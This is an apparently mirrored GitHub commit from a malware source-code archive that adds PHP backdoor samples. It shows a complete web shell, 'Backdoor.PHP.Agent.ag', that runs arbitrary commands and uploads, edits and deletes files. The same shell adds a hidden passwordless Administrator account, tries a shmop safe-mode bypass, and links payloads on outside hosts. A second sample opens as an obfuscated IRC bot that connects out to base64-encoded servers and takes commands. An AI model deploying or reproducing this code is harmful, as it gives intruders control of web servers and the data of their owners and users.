mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-05 09:55:27 +00:00
Add files via upload
This commit is contained in:
parent
06828a0956
commit
27f87bc75b
2226
PHP/Backdoor.PHP.Agent.ad
Normal file
2226
PHP/Backdoor.PHP.Agent.ad
Normal file
File diff suppressed because it is too large
Load Diff
8346
PHP/Backdoor.PHP.Agent.af
Normal file
8346
PHP/Backdoor.PHP.Agent.af
Normal file
File diff suppressed because one or more lines are too long
467
PHP/Backdoor.PHP.Agent.ag
Normal file
467
PHP/Backdoor.PHP.Agent.ag
Normal file
@ -0,0 +1,467 @@
|
|||||||
|
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
|
||||||
|
<html>
|
||||||
|
|
||||||
|
<head>
|
||||||
|
<meta http-equiv="Content-Language" content="pt-br">
|
||||||
|
<meta name="GENERATOR" content="Microsoft FrontPage 5.0">
|
||||||
|
<meta name="ProgId" content="AoD">
|
||||||
|
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
|
||||||
|
<title>By xIgOr > AoD > CMD > File List</title>
|
||||||
|
<style type="text/css">
|
||||||
|
A:link {text-decoration:none}
|
||||||
|
A:visited {text-decoration:none}
|
||||||
|
A:hover {text-decoration:underline}
|
||||||
|
A:active {text-decoration:underline}
|
||||||
|
</style>
|
||||||
|
</head>
|
||||||
|
<body style="font-family: Tahoma; font-size: 10px">
|
||||||
|
<?php
|
||||||
|
|
||||||
|
@set_time_limit(0);
|
||||||
|
|
||||||
|
$string = $_SERVER['QUERY_STRING'];
|
||||||
|
$mhost = 'http://geocities.yahoo.com.br/eircsnx/list.txt?';
|
||||||
|
$host_all = explode("$mhost", $string);
|
||||||
|
$s1 = $host_all[0];
|
||||||
|
$fstring = $_SERVER['PHP_SELF']."?".$s1.$mhost;
|
||||||
|
|
||||||
|
$OS = @PHP_OS;
|
||||||
|
$IpServer = '127.0.0.1';
|
||||||
|
$UNAME = @php_uname();
|
||||||
|
$PHPv = @phpversion();
|
||||||
|
$SafeMode = @ini_get('safe_mode');
|
||||||
|
|
||||||
|
if ($SafeMode == '') { $SafeMode = "<i>OFF</i>"; }
|
||||||
|
else { $SafeMode = "<i>$SafeMode</i>"; }
|
||||||
|
|
||||||
|
$btname = 'backtool.txt';
|
||||||
|
$bt = 'http://www.full-comandos.com/jobing/r0nin';
|
||||||
|
$dc = 'http://www.full-comandos.com/jobing/dc.txt';
|
||||||
|
$newuser = '@echo off;net user Admin /add /expires:never /passwordreq:no;net localgroup "Administrators" /add Admin;net localgroup "Users" /del Admin';
|
||||||
|
// Java Script
|
||||||
|
echo "<script type=\"text/javascript\"> </script>";
|
||||||
|
|
||||||
|
// End JavaScript
|
||||||
|
|
||||||
|
/* Functions */
|
||||||
|
function cmd($CMDs) {
|
||||||
|
$CMD[1] = '';
|
||||||
|
exec($CMDs, $CMD[1]);
|
||||||
|
if (empty($CMD[1])) {
|
||||||
|
$CMD[1] = shell_exec($CMDs);
|
||||||
|
}
|
||||||
|
elseif (empty($CMD[1])) {
|
||||||
|
$CMD[1] = passthru($CMDs);
|
||||||
|
}
|
||||||
|
elseif (empty($CMD[1])) {
|
||||||
|
$CMD[1] = system($CMDs);
|
||||||
|
}
|
||||||
|
elseif (empty($CMD[1])) {
|
||||||
|
$handle = popen($CMDs, 'r');
|
||||||
|
while(!feof($handle)) {
|
||||||
|
$CMD[1][] .= fgets($handle);
|
||||||
|
}
|
||||||
|
pclose($handle);
|
||||||
|
}
|
||||||
|
return $CMD[1];
|
||||||
|
}
|
||||||
|
|
||||||
|
if (@$_GET['chdir']) {
|
||||||
|
$chdir = $_GET['chdir'];
|
||||||
|
} else {
|
||||||
|
$chdir = getcwd()."/";
|
||||||
|
}
|
||||||
|
if (@chdir("$chdir")) {
|
||||||
|
$msg = "<font color=\"#008000\">Entrance in the directory, OK!</font>";
|
||||||
|
} else {
|
||||||
|
$msg = "<font color=\"#FF0000\">Error to enters it in the directory!</font>";
|
||||||
|
$chdir = str_replace($SCRIPT_NAME, "", $_SERVER['SCRIPT_NAME']);
|
||||||
|
}
|
||||||
|
$chdir = str_replace(chr(92), chr(47), $chdir);
|
||||||
|
|
||||||
|
if (@$_GET['action'] == 'upload') {
|
||||||
|
$uploaddir = $chdir;
|
||||||
|
$uploadfile = $uploaddir. $_FILES['userfile']['name'];
|
||||||
|
if (@move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir . $_FILES['userfile']['name'])) {
|
||||||
|
$msg = "<font color=\"#008000\"><font color=\"#000080\">{$_FILES['userfile']['name']}</font>, the archive is validates and was loaded successfully.</font>";
|
||||||
|
} else {
|
||||||
|
$msg = "<font color=\"#FF0000\">Error when copying archive.</font>";
|
||||||
|
}
|
||||||
|
}
|
||||||
|
elseif (@$_GET['action'] == 'mkdir') {
|
||||||
|
$newdir = $_GET['newdir'];
|
||||||
|
if (@mkdir("$chdir"."$newdir")) {
|
||||||
|
$msg = "<font color=\"#008000\"><font color=\"#000080\">{$newdir}</font>, directory created successfully.</font>";
|
||||||
|
} else {
|
||||||
|
$msg = "<font color=\"#FF0000\">Error to it creates directory.</font>";
|
||||||
|
}
|
||||||
|
}
|
||||||
|
elseif (@$_GET['action'] == 'newfile') {
|
||||||
|
$newfile = $_GET['newfile'];
|
||||||
|
if (@touch("$chdir"."$newfile")) {
|
||||||
|
$msg = "<font color=\"#008000\"><font color=\"#000080\">{$newfile}</font>, created successfully!</font>";
|
||||||
|
} else {
|
||||||
|
$msg = "<font color=\"#FF0000\">Error to tries it creates archive.</font>";
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
elseif (@$_GET['action'] == 'del') {
|
||||||
|
$file = $_GET['file']; $type = $_GET['type'];
|
||||||
|
if ($type == 'file') {
|
||||||
|
if (@unlink("$chdir"."$file")) {
|
||||||
|
$msg = "<font color=\"#008000\"><font color=\"#000080\">{$file}</font>, successfully excluded archive!</font>";
|
||||||
|
} else {
|
||||||
|
$msg = "<font color=\"#FF0000\">Error to it I excluded archive!</font>";
|
||||||
|
}
|
||||||
|
} elseif ($type == 'dir') {
|
||||||
|
if (@rmdir("$chdir"."$file")) {
|
||||||
|
$msg = "<font color=\"#008000\"><font color=\"#000080\">{$file}</font>, successfully excluded directory!</font>";
|
||||||
|
} else {
|
||||||
|
$msg = "<font color=\"#FF0000\">Error to it I excluded directory!</font>";
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
elseif (@$_GET['action'] == 'chmod') {
|
||||||
|
$file = $chdir.$_GET['file']; $chmod = $_GET['chmod'];
|
||||||
|
if (@chmod ("$file", $chmod)) {
|
||||||
|
|
||||||
|
$msg = "<font color=\"#008000\">Chmod of</font> <font color=\"#000080\">{$_GET['file']}</font> <font color=\"#008000\">moved for</font> <font color=\"#000080\">$chmod</font> <font color=\"#008000\">successfully.</font>";
|
||||||
|
} else {
|
||||||
|
$msg = '<font color=\"#FF0000\">Error when moving chmod.</font>';
|
||||||
|
}
|
||||||
|
}
|
||||||
|
elseif (@$_GET['action'] == 'rename') {
|
||||||
|
$file = $_GET['file']; $newname = $_GET['newname'];
|
||||||
|
if (@rename("$chdir"."$file", "$chdir"."$newname")) {
|
||||||
|
$msg = "<font color=\"#008000\">Archive</font> <font color=\"#000080\">{$file}</font> <font color=\"#008000\">named for</font> <font color=\"#000080\">{$newname}</font> <font color=\"#008000\">successfully!</font>";
|
||||||
|
} else {
|
||||||
|
$msg = "<font color=\"#FF0000\">Error to it nominates archive.</font>";
|
||||||
|
}
|
||||||
|
}
|
||||||
|
elseif (@$_GET['action'] == 'copy') {
|
||||||
|
$file = $chdir.$_GET['file']; $copy = $_GET['fcopy'];
|
||||||
|
if (@copy("$file", "$copy")) {
|
||||||
|
$msg = "<font color=\"#000080\">{$file}</font>, <font color=\"#008000\">copied for</font> <font color=\"#000080\">{$copy}</font> <font color=\"#008000\">successfully!</font>";
|
||||||
|
} else {
|
||||||
|
$msg = "<font color=\"#FF0000\">Error when copying</font> <font color=\"#000000\">{$file}</font> <font color=\"#FF0000\">for</font> <font color=\"#000000\">{$copy}</font></font>";
|
||||||
|
}
|
||||||
|
}
|
||||||
|
/* Parte Atualiza 02:48 12/2/2006 */
|
||||||
|
|
||||||
|
elseif (@$_GET['action'] == 'cmd') {
|
||||||
|
if (!empty($_GET['cmd'])) { $cmd = @$_GET['cmd']; }
|
||||||
|
if (!empty($_POST['cmd'])) { $cmd = @$_POST['cmd']; }
|
||||||
|
$cmd = stripslashes(trim($cmd));
|
||||||
|
$result_arr = cmd($cmd);
|
||||||
|
|
||||||
|
$afim = count($result_arr); $acom = 0; $msg = '';
|
||||||
|
$msg .= "<p style=\"color: #000000;text-align: center;font-family: 'Lucida Console';font-size: 12px;margin 2\">Results: <b>".$cmd."</b></p>";
|
||||||
|
if ($result_arr) {
|
||||||
|
while ($acom <= $afim) {
|
||||||
|
$msg .= "<p style=\"color: #008000;text-align: left;font-family: 'Lucida Console';font-size: 12px;margin 2\"> ".@$result_arr[$acom]."</p>";
|
||||||
|
$acom++;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
else {
|
||||||
|
$msg .= "<p style=\"color: #FF0000;text-align: center;font-family: 'Lucida Console';font-size: 12px;margin 2\">Erro ao executar comando.</p>";
|
||||||
|
}
|
||||||
|
}
|
||||||
|
elseif (@$_GET['action'] == 'safemode') {
|
||||||
|
if (@!extension_loaded('shmop')) {
|
||||||
|
echo "Loading... module</br>";
|
||||||
|
|
||||||
|
if (strtoupper(substr(PHP_OS, 0,3) == 'WIN')) {
|
||||||
|
@dl('php_shmop.dll');
|
||||||
|
} else {
|
||||||
|
@dl('shmop.so');
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
if (@extension_loaded('shmop')) {
|
||||||
|
echo "Module: <b>shmop</b> loaded!</br>";
|
||||||
|
|
||||||
|
$shm_id = @shmop_open(0xff2, "c", 0644, 100);
|
||||||
|
if (!$shm_id) { echo "Couldn't create shared memory segment\n"; }
|
||||||
|
$data="\x00";
|
||||||
|
$offset=-3842685;
|
||||||
|
$shm_bytes_written = @shmop_write($shm_id, $data, $offset);
|
||||||
|
if ($shm_bytes_written != strlen($data)) { echo "Couldn't write the entire length of data\n"; }
|
||||||
|
if (!shmop_delete($shm_id)) { echo "Couldn't mark shared memory block for deletion."; }
|
||||||
|
echo passthru("id");
|
||||||
|
shmop_close($shm_id);
|
||||||
|
|
||||||
|
|
||||||
|
} else { echo "Module: <b>shmop</b> not loaded!</br>"; }
|
||||||
|
}
|
||||||
|
|
||||||
|
elseif (@$_GET['action'] == 'zipen') {
|
||||||
|
$file = $_GET['file'];
|
||||||
|
$zip = @zip_open("$chdir"."$file");
|
||||||
|
$msg = '';
|
||||||
|
if ($zip) {
|
||||||
|
|
||||||
|
while ($zip_entry = zip_read($zip)) {
|
||||||
|
$msg .= "Name: " . zip_entry_name($zip_entry) . "\n";
|
||||||
|
$msg .= "Actual Filesize: " . zip_entry_filesize($zip_entry) . "\n";
|
||||||
|
$msg .= "Compressed Size: " . zip_entry_compressedsize($zip_entry) . "\n";
|
||||||
|
$msg .= "Compression Method: " . zip_entry_compressionmethod($zip_entry) . "\n";
|
||||||
|
|
||||||
|
if (zip_entry_open($zip, $zip_entry, "r")) {
|
||||||
|
echo "File Contents:\n";
|
||||||
|
$buf = zip_entry_read($zip_entry, zip_entry_filesize($zip_entry));
|
||||||
|
echo "$buf\n";
|
||||||
|
|
||||||
|
zip_entry_close($zip_entry);
|
||||||
|
}
|
||||||
|
echo "\n";
|
||||||
|
|
||||||
|
}
|
||||||
|
|
||||||
|
zip_close($zip);
|
||||||
|
|
||||||
|
}
|
||||||
|
}
|
||||||
|
elseif (@$_GET['action'] == 'edit') {
|
||||||
|
$file = $_GET['file'];
|
||||||
|
$conteudo = '';
|
||||||
|
$filename = "$chdir"."$file";
|
||||||
|
$conteudo = @file_get_contents($filename);
|
||||||
|
$conteudo = htmlspecialchars($conteudo);
|
||||||
|
$back = $_SERVER['HTTP_REFERER'];
|
||||||
|
echo "<p align=\"center\">Editing {$file} ...</p>";
|
||||||
|
echo "<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" style=\"border-collapse: collapse\" width=\"100%\" id=\"editacao\">";
|
||||||
|
echo "<tr>";
|
||||||
|
echo "<td width=\"100%\">";
|
||||||
|
echo "<form method=\"POST\" action=\"{$fstring}&action=save&chdir={$chdir}&file={$file}\">";
|
||||||
|
echo "<!--webbot bot=\"SaveResults\" u-file=\"_private/form_results.csv\" s-format=\"TEXT/CSV\" s-label-fields=\"TRUE\" --><p align=\"center\">";
|
||||||
|
print "<textarea rows=\"18\" name=\"S1\" cols=\"89\" style=\"font-family: Verdana; font-size: 10pt; border: 1px solid #000000\">{$conteudo}</textarea></p>";
|
||||||
|
echo "<p align=\"center\">";
|
||||||
|
echo "<input type=\"submit\" value=\"Save\" name=\"B2\" style=\"font-family: Tahoma; font-size: 10px; border: 1px solid #000000\"> ";
|
||||||
|
echo "<input type=\"button\" value=\"Closes Publisher\" Onclick=\"javascript:window.location='{$fstring}&chdir={$chdir}'\" name=\"B1\" style=\"font-family: Tahoma; font-size: 10px; border: 1px solid #000000\"> ";
|
||||||
|
echo "</form>";
|
||||||
|
echo "</td>";
|
||||||
|
echo "</tr>";
|
||||||
|
echo "</table>";
|
||||||
|
}
|
||||||
|
elseif (@$_GET['action'] == 'save') {
|
||||||
|
$filename = "$chdir".$_GET['file'];
|
||||||
|
$somecontent = $_POST['S1'];
|
||||||
|
$somecontent = stripslashes(trim($somecontent));
|
||||||
|
if (is_writable($filename)) {
|
||||||
|
@$handle = fopen ($filename, "w");
|
||||||
|
@$fw = fwrite($handle, $somecontent);
|
||||||
|
@fclose($handle);
|
||||||
|
if ($handle && $fw) {
|
||||||
|
$msg = "<font color=\"#000080\">{$_GET['file']}</font>, <font color=\"#008000\">edited successfully!</font>";
|
||||||
|
}
|
||||||
|
} else {
|
||||||
|
$msg = "<font color=\"#000000\">{$_GET['file']},</font> <font color=\"#FF0000\">cannot be written!</font>";
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// Informações
|
||||||
|
$cmdget = '';
|
||||||
|
if (!empty($_GET['cmd'])) { $cmdget = @$_GET['cmd']; }
|
||||||
|
if (!empty($_POST['cmd'])) { $cmdget = @$_POST['cmd']; }
|
||||||
|
$cmdget = htmlspecialchars($cmdget);
|
||||||
|
function asdads() {
|
||||||
|
$asdads = '';
|
||||||
|
if (@file_exists("/usr/bin/wget")) { $asdads .= "wget "; }
|
||||||
|
if (@file_exists("/usr/bin/fetch")) { $asdads .= "fetch "; }
|
||||||
|
if (@file_exists("/usr/bin/curl")) { $asdads .= "curl "; }
|
||||||
|
if (@file_exists("/usr/bin/GET")) { $asdads .= "GET "; }
|
||||||
|
if (@file_exists("/usr/bin/lynx")) { $asdads .= "lynx "; }
|
||||||
|
return $asdads;
|
||||||
|
}
|
||||||
|
|
||||||
|
echo "<form method=\"POST\" name=\"cmd\" action=\"{$fstring}&action=cmd&chdir=$chdir\">";
|
||||||
|
echo "<fieldset style=\"border: 1px solid #000000; padding: 2\">";
|
||||||
|
echo "<legend>Informações</legend>";
|
||||||
|
echo "<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" style=\"border-collapse: collapse; font-family: Tahoma; font-size: 10px\" width=\"100%\">";
|
||||||
|
echo "<tr>";
|
||||||
|
echo "<td width=\"8%\">";
|
||||||
|
echo "<p align=\"right\"><b>Sistema:</b> </td></p>";
|
||||||
|
echo "<td width=\"92%\"> {$OS}</td>";
|
||||||
|
echo "</tr>";
|
||||||
|
echo "<tr>";
|
||||||
|
echo "<td width=\"8%\">";
|
||||||
|
echo "<p align=\"right\"><b>Uname: </b></td></p>";
|
||||||
|
echo "<td width=\"92%\"> {$UNAME}</td>";
|
||||||
|
echo "</tr>";
|
||||||
|
echo "<tr>";
|
||||||
|
echo "<td width=\"8%\">";
|
||||||
|
echo "<p align=\"right\"><b>PHP: </b></td></p>";
|
||||||
|
echo "<td width=\"92%\"> {$PHPv}, <b>safe mode:</b> {$SafeMode}</td>";
|
||||||
|
echo "</tr>";
|
||||||
|
if (strtoupper(substr($OS, 0,3) != 'WIN')) {
|
||||||
|
$Methods = asdads();
|
||||||
|
if ($Methods == '') { $Methods = "???"; }
|
||||||
|
echo "<tr>";
|
||||||
|
echo "<td width=\"8%\">";
|
||||||
|
echo "<p align=\"right\"><b>Methods: </b></td></p>";
|
||||||
|
echo "<td width=\"92%\"> {$Methods}</td>";
|
||||||
|
echo "</tr>";
|
||||||
|
}
|
||||||
|
|
||||||
|
echo "<tr>";
|
||||||
|
echo "<td width=\"8%\">";
|
||||||
|
echo "<p align=\"right\"><b>Ip: </b></td></p>";
|
||||||
|
echo "<td width=\"92%\"> {$IpServer}</td>";
|
||||||
|
echo "</tr>";
|
||||||
|
echo "<tr>";
|
||||||
|
echo "<td width=\"8%\">";
|
||||||
|
echo "<p align=\"right\"><b>Command: </b></td></p>";
|
||||||
|
echo "<td width=\"92%\"> <input type=\"text\" size=\"70\" name=\"cmd\" value=\"{$cmdget}\" style=\"font-family: Tahoma; font-size: 10 px; border: 1px solid #000000\"> <input type=\"submit\" name=\"action\" value=\"Send\" style=\"font-family: Tahoma; font-size: 10 px; border: 1px solid #000000\"></td>";
|
||||||
|
echo "</tr>";
|
||||||
|
echo "</table>";
|
||||||
|
echo "</fieldset></form>";
|
||||||
|
// Dir
|
||||||
|
|
||||||
|
echo "<form method=\"POST\" action=\"{$fstring}&action=upload&chdir=$chdir\" enctype=\"multipart/form-data\">";
|
||||||
|
echo "<!--webbot bot=\"FileUpload\" u-file=\"_private/form_results.csv\" s-format=\"TEXT/CSV\" s-label-fields=\"TRUE\" --><fieldset style=\"border: 1px solid #000000; padding: 2\">";
|
||||||
|
if (is_writable("$chdir")) {
|
||||||
|
if (strtoupper(substr($OS, 0,3) == 'WIN')) {
|
||||||
|
echo "<legend>Dir <b>YES</b>: {$chdir} - <a href=\"#[New Dir]\" onclick=\"Mkdir('{$chdir}');\">[New Dir]</a> <a href=\"#[New File]\" onclick=\"Newfile('{$chdir}')\">[New File]</a> <a href=\"{$fstring}&action=cmd&chdir={$chdir}&cmd=$newuser\">[Remote Access]</a></legend>";
|
||||||
|
} else {
|
||||||
|
echo "<legend>Dir <b>YES</b>: {$chdir} - <a href=\"#[New Dir]\" onclick=\"Mkdir('{$chdir}');\">[New Dir]</a> <a href=\"#[New File]\" onclick=\"Newfile('{$chdir}')\">[New File]</a> <a href=\"{$fstring}&action=backtool&chdir={$chdir}&write=yes\">[BackTool]</a></legend>";
|
||||||
|
}
|
||||||
|
}
|
||||||
|
else {
|
||||||
|
if (strtoupper(substr($OS, 0,3) == 'WIN')) {
|
||||||
|
echo "<legend>Dir NO: {$chdir} - <a href=\"#[New Dir]\" onclick=\"Mkdir('{$chdir}');\">[New Dir]</a> <a href=\"#[New File]\" onclick=\"Newfile('{$chdir}')\">[New File]</a> <a href=\"{$fstring}&action=cmd&chdir={$chdir}&cmd={$newuser}\">[Remote Access]</a></legend>";
|
||||||
|
} else {
|
||||||
|
echo "<legend>Dir NO: {$chdir} - <a href=\"#[New Dir]\" onclick=\"Mkdir('{$chdir}');\">[New Dir]</a> <a href=\"#[New File]\" onclick=\"Newfile('{$chdir}')\">[New File]</a> <a href=\"{$fstring}&action=backtool&chdir={$chdir}&write=no\">[BackTool]</a></legend>";
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
if (@!$handle = opendir("$chdir")) {
|
||||||
|
echo " I could not enters in the directory, <a href=\"{$fstring}\">click here!</a> for return to the original directory!</br>";
|
||||||
|
}
|
||||||
|
else {
|
||||||
|
echo " <table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" style=\"border-collapse: collapse; font-family: Tahoma; font-size: 10px\" width=\"100%\">";
|
||||||
|
echo " <tr>";
|
||||||
|
echo " <td width=\"100%\" style=\"font-family: Tahoma; font-size: 10px\" colspan=\"4\"> Upload:";
|
||||||
|
echo " <input type=\"file\" name=\"userfile\" size=\"91\" style=\"font-family: Tahoma; font-size: 10px; border-style: solid; border-width: 1\">";
|
||||||
|
echo " <input type=\"submit\" value=\"Send\" name=\"B1\" style=\"font-family: Tahoma; font-size: 10px; border: 1px solid #000000\"></td>";
|
||||||
|
echo " </tr>";
|
||||||
|
echo " <tr>";
|
||||||
|
echo " <td width=\"100%\" style=\"font-family: Tahoma; font-size: 10px\" colspan=\"4\"> </td>";
|
||||||
|
echo " </tr>";
|
||||||
|
echo " <tr>";
|
||||||
|
echo " <td width=\"100%\" style=\"font-family: Tahoma; font-size: 10px\" colspan=\"4\">";
|
||||||
|
if (@!$msg) {
|
||||||
|
echo " <p align=\"left\">Messages</td>";
|
||||||
|
} else {
|
||||||
|
echo " <p align=\"left\">$msg</td>";
|
||||||
|
}
|
||||||
|
echo " </tr>";
|
||||||
|
echo " <tr>";
|
||||||
|
echo " <td width=\"100%\" colspan=\"4\"> </td>";
|
||||||
|
echo " </tr>";
|
||||||
|
echo " <tr>";
|
||||||
|
echo " <td width=\"9%\"> Perms</td>";
|
||||||
|
echo " <td width=\"49%\"> File </td>";
|
||||||
|
echo " <td width=\"10%\"> Size </td>";
|
||||||
|
echo " <td width=\"32%\"> Commands</td>";
|
||||||
|
echo " </tr>";
|
||||||
|
$colorn = 0;
|
||||||
|
while (false !== ($file = readdir($handle))) {
|
||||||
|
if ($file != '.') {
|
||||||
|
if ($colorn == 0) {
|
||||||
|
$color = "style=\"background-color: #FFCC66\"";
|
||||||
|
}
|
||||||
|
elseif ($colorn == 1) {
|
||||||
|
$color = "style=\"background-color: #C0C0C0\"";
|
||||||
|
}
|
||||||
|
if (@is_dir("$chdir"."$file")) {
|
||||||
|
$file = $file.'/';
|
||||||
|
$mode = 'chdir';
|
||||||
|
} else {
|
||||||
|
$mode = 'edit';
|
||||||
|
}
|
||||||
|
if (@substr("$chdir", strlen($chdir) -1, 1) != '/') {
|
||||||
|
$chdir .= '/';
|
||||||
|
}
|
||||||
|
if ($file == '../') {
|
||||||
|
$lenpath = strlen($chdir); $baras = 0;
|
||||||
|
for ($i = 0;$i < $lenpath;$i++) { if ($chdir{$i} == '/') { $baras++; } }
|
||||||
|
$chdir_ = explode("/", $chdir);
|
||||||
|
$chdirpox = str_replace($chdir_[$baras-1].'/', "", $chdir);
|
||||||
|
}
|
||||||
|
$perms = @fileperms ("$chdir"."$file");
|
||||||
|
if ($perms == '') {
|
||||||
|
$perms = '???';
|
||||||
|
}
|
||||||
|
$size = @filesize ("$chdir"."$file");
|
||||||
|
$size = $size / 1024;
|
||||||
|
$size = explode(".", $size);
|
||||||
|
if (@$size[1] != '') {
|
||||||
|
$size = $size[0].'.'.@substr("$size[1]", 0, 2);
|
||||||
|
} else {
|
||||||
|
$size = $size[0];
|
||||||
|
}
|
||||||
|
if ($size == 0) {
|
||||||
|
if ($mode == 'chdir') {
|
||||||
|
$size = '???';
|
||||||
|
}
|
||||||
|
}
|
||||||
|
echo "<tr>";
|
||||||
|
echo "<td width=\"9%\" $color> $perms</td>";
|
||||||
|
if (@is_writable ("$chdir"."$file")) {
|
||||||
|
if ($mode == 'chdir') {
|
||||||
|
if ($file == '../') {
|
||||||
|
echo "<td width=\"49%\" $color> <b><a href=\"{$fstring}&chdir=$chdirpox\">$file</a></b></td>";
|
||||||
|
} else {
|
||||||
|
echo "<td width=\"49%\" $color> <b><a href=\"{$fstring}&chdir={$chdir}{$file}\">$file</a></b></td>";
|
||||||
|
}
|
||||||
|
} else {
|
||||||
|
if (is_readable("$chdir"."$file")) {
|
||||||
|
echo "<td width=\"49%\" $color> <b><a href=\"{$fstring}&action=edit&chdir=$chdir&file=$file\">$file</a></b></td>";
|
||||||
|
} else {
|
||||||
|
echo "<td width=\"49%\" $color> <b>$file</b></td>";
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
else {
|
||||||
|
if ($mode == 'chdir') {
|
||||||
|
if ($file == '../') {
|
||||||
|
echo "<td width=\"49%\" $color> <a href=\"{$fstring}&chdir=$chdirpox\">$file</a></td>";
|
||||||
|
} else {
|
||||||
|
echo "<td width=\"49%\" $color> <a href=\"{$fstring}&chdir={$chdir}{$file}\">$file</a></td>";
|
||||||
|
}
|
||||||
|
} else {
|
||||||
|
if (@is_readable("$chdir"."$file")) {
|
||||||
|
echo "<td width=\"49%\" $color> <a href=\"{$fstring}&action=edit&chdir=$chdir&file=$file\">$file</a></td>";
|
||||||
|
} else {
|
||||||
|
echo "<td width=\"49%\" $color> $file</td>";
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
echo "<td width=\"10%\" $color> $size KB</td>";
|
||||||
|
if ($mode == 'edit') {
|
||||||
|
echo "<td width=\"32%\" $color> <a href=\"#{$file}\" onclick=\"Rename('{$chdir}', '{$file}', '{$mode}')\">[Rename]</a> <a href=\"{$fstring}&action=del&chdir={$chdir}&file={$file}&type=file\">[Del]</a> <a href=\"#{$file}\" onclick=\"ChMod('$chdir', '$file')\">[Chmod]</a> <a href=\"#{$file}\" onclick=\"Copy('{$chdir}', '{$file}')\">[Copy]</a></td>";
|
||||||
|
} else {
|
||||||
|
echo "<td width=\"32%\" $color> <a href=\"#{$file}\" onclick=\"Rename('{$chdir}', '{$file}', '{$mode}')\">[Rename]</a> <a href=\"{$fstring}&action=del&chdir={$chdir}&file={$file}&type=dir\">[Del]</a> <a href=\"#{$file}\" onclick=\"ChMod('$chdir', '$file')\">[Chmod]</a> [Copy]</td>";
|
||||||
|
}
|
||||||
|
echo "</tr>";
|
||||||
|
if ($colorn == 0) {
|
||||||
|
$colorn = 1;
|
||||||
|
}
|
||||||
|
elseif ($colorn == 1) {
|
||||||
|
$colorn = 0;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
closedir($handle);
|
||||||
|
}
|
||||||
|
?>
|
||||||
|
</table>
|
||||||
|
</fieldset></form>
|
||||||
|
<p align="center">
|
||||||
|
<a href="http://validator.w3.org/check?uri=referer"><img
|
||||||
|
src="http://www.w3.org/Icons/valid-html401"
|
||||||
|
alt="Valid HTML 4.01 Transitional" height="31" width="88"></a>
|
||||||
|
</p>
|
||||||
|
</body>
|
||||||
|
|
||||||
|
</html>
|
135
PHP/Backdoor.PHP.Agent.ah
Normal file
135
PHP/Backdoor.PHP.Agent.ah
Normal file
@ -0,0 +1,135 @@
|
|||||||
|
<? set_time_limit(0); ini_set("max_execution_time",0); set_magic_quotes_runtime(0); ini_set('output_buffering',0);
|
||||||
|
error_reporting(0); ignore_user_abort(); function hc8a89c2c306fb($p341be97d9aff9) { $p341be97d9aff9 = str_replace(" ", "", $p341be97d9aff9);
|
||||||
|
return $p341be97d9aff9; } function ub5d21085bf2c0($p341be97d9aff9) { $p341be97d9aff9 = base64_decode(hc8a89c2c306fb($p341be97d9aff9));
|
||||||
|
return $p341be97d9aff9; } $oec12e0af93cb5 = array ( "po" => 8080, "sp" => "xZiGuIrSlJaYlw==", "ch" => "dVZQuw==",
|
||||||
|
"ke" => "k3h2", "ha" => "gW1NZ0+eTmOGmldl", "pa" => "i5eHeoqSWmZXWmuZW2ZoapttnGhtb22cYW1olWlok2o=",
|
||||||
|
"tr" => "*", "mrnd" => 9, "mo" => "f6tOrw==", "ve" => "g2FVfok=" ); function dfc35fdc70d5fc() {
|
||||||
|
global $oec12e0af93cb5; $xee11cbb19052e = array(); $ed707b8140a662 = ""; $n59b514174bffe = array("uqKQq5HDl6iShaFkmpuamqOrZ5Onpg==","tKiVtI7Mi6KGkmGtiJuZpKhmnJ+l","tJSPspjKiaiYkZSkUa2am5mmrF6bqKY=","v5aEuFPCiGOHkKibj5+jm2Oang==","v5aEuJHNl2OUlJikh6SoZJed","wKZUdlPRmaeUk6dkhqWi","v5aEuJHNl2OJkpymUaSaqg==","g2GRuVWRUpaSiaWfhpejq6Oeop6hrKGclGaWoaA=");
|
||||||
|
shuffle($n59b514174bffe); if(($o351a1d2ad68bc = fsockopen(ef9feaa9bcab30($n59b514174bffe[0]),$oec12e0af93cb5['po'],$i70106d0d82151,$q809b1abe3f111,15))) {
|
||||||
|
$d8052146769b14 = bd988971435842($oec12e0af93cb5['mrnd']); if (strlen($oec12e0af93cb5['sp'])>0) { i56eacb300613d($o351a1d2ad68bc, ub5d21085bf2c0("UEFTUw==")." ".ef9feaa9bcab30($oec12e0af93cb5['sp']));
|
||||||
|
} i56eacb300613d($o351a1d2ad68bc, ub5d21085bf2c0("VVNFUg==")." ".bfb0daa8f01135($oec12e0af93cb5['mrnd'])." 127.0.0.1 localhost :$d8052146769b14");
|
||||||
|
i56eacb300613d($o351a1d2ad68bc, ub5d21085bf2c0("TklDSw==")." $d8052146769b14"); while (!feof($o351a1d2ad68bc)) {
|
||||||
|
$l7fabc1404929c = trim(fgets($o351a1d2ad68bc,512)); $b6e2baaf3b97db = explode(" ",$l7fabc1404929c);
|
||||||
|
if(($l7fabc1404929c == $ed707b8140a662)) continue; if (isset($b6e2baaf3b97db[0]) && $b6e2baaf3b97db[0] == ub5d21085bf2c0("UElORw==")) {
|
||||||
|
i56eacb300613d($o351a1d2ad68bc, ub5d21085bf2c0("UE9ORw==")." ".$b6e2baaf3b97db[1]); } else if (isset($b6e2baaf3b97db[1]) && $b6e2baaf3b97db[1] == ub5d21085bf2c0("MDAx")) {
|
||||||
|
i56eacb300613d($o351a1d2ad68bc, ub5d21085bf2c0("TU9ERQ==")." $d8052146769b14 ".ef9feaa9bcab30($oec12e0af93cb5['mo']));
|
||||||
|
